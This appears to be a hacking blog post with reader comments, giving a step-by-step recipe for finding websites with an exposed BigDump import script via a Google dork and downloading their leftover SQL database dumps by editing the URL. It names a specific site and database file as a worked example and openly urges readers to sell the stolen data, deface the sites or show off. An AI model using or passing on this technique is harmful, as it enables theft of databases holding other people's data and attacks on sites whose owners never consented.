enj0y the f*****g database vul.
you can get many websites database and u know if u got the db power is urs ...u can sell it deface the site or juss to show off
its very much easy......
google dork
Dork For Search :
Code:
inurl:/''bigdump.php'' intitle:BigDump ver. 0.29b
search the above dork over google , u will get lots of sites [ not all would be vulnerable to this exploit ]
here m taking an example for the brief explanation
Code:
http://distribution.lux.org.uk/d/bigdump.php
if u open this u will see the db file i.e,
Code:
luxvideo_magento (2).sql
[isnt it ultimate ]
now , to get the db file u will have to replace the url with the db name
like
Code:
http://distribution.lux.org.uk/d/luxvideo_magento (2).sql
as soon as u will execute the above url , downloading will start and rest u kn0w what u can u do
Nice, but what to do with database file, its in .sql format, so heavy to open in any editor...
ReplyDeleteif you want may contact with me at Prince.Tanweer@ymail.com
Thanks.
use notepad++ to have a look or
ReplyDeletejust upload it in ur local database..